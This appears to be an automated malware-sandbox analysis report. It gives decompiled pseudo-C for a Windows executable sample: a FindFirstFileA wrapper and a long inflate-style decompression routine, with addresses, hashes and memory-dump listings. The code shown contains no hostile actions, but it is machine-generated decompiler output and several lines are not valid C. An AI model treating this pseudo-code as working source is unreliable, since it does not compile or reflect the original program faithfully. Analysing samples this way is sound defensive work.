                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00402671, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 39%
                                                                                            			E00402671(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
					E00405B25(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405BC7();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                            0x00402689
                                                                                            0x0040269d
                                                                                            0x004026a8
                                                                                            0x004026a9
                                                                                            0x004027e4
                                                                                            0x0040268b
                                                                                            0x0040268b
                                                                                            0x0040268d
                                                                                            0x0040268f
                                                                                            0x0040268f
                                                                                            0x004028c1
                                                                                            0x004028cd

                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: FileFindFirst
                                                                                            • String ID:
                                                                                            • API String ID: 1974802433-0
                                                                                            • Opcode ID: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
                                                                                            • Instruction ID: d100cd6159f555773fbda265320c1ac67d2490096a0530dc8ee4140695772295
                                                                                            • Opcode Fuzzy Hash: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
                                                                                            • Instruction Fuzzy Hash: 24F0A0326081049ED711EBA99A499EEB778DB11328F6045BFE101B61C1C7B859459A3A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00406354, Relevance: .3, Instructions: 334COMMONCrypto
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 79%
                                                                                            			E00406354(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E00406AC3( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4073e8; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4073e8; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E00406B2B( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00406A83))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42dbb8;
												if( *0x42dbb8 != 0) {
													L22:
													_t412 =  *0x40942c; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x409430; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42ca34; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42ca30; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42ca38;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42ceb8;
													if(_t416 < 0x42ceb8) {
														L15:
														__eflags = _t416 - 0x42cc74;
														_t438 = 8;
														if(_t416 > 0x42cc74) {
															__eflags = _t416 - 0x42ce38;
															if(_t416 >= 0x42ce38) {
																__eflags = _t416 - 0x42ce98;
																if(_t416 < 0x42ce98) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E00406B2B(0x42ca38, 0x120, 0x101, 0x4073fc, 0x40743c, 0x42ca34, 0x40942c, 0x42d338, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42ca38, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42ca38 + _t440;
														E00406B2B(0x42ca38, 0x1e, 0, 0x40747c, 0x4074b8, 0x42ca30, 0x409430, 0x42d338, _t448 - 8);
														 *0x42dbb8 =  *0x42dbb8 + 1;
														__eflags =  *0x42dbb8;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x10;
												if(__ebx >= 0x10) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E0040585F( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
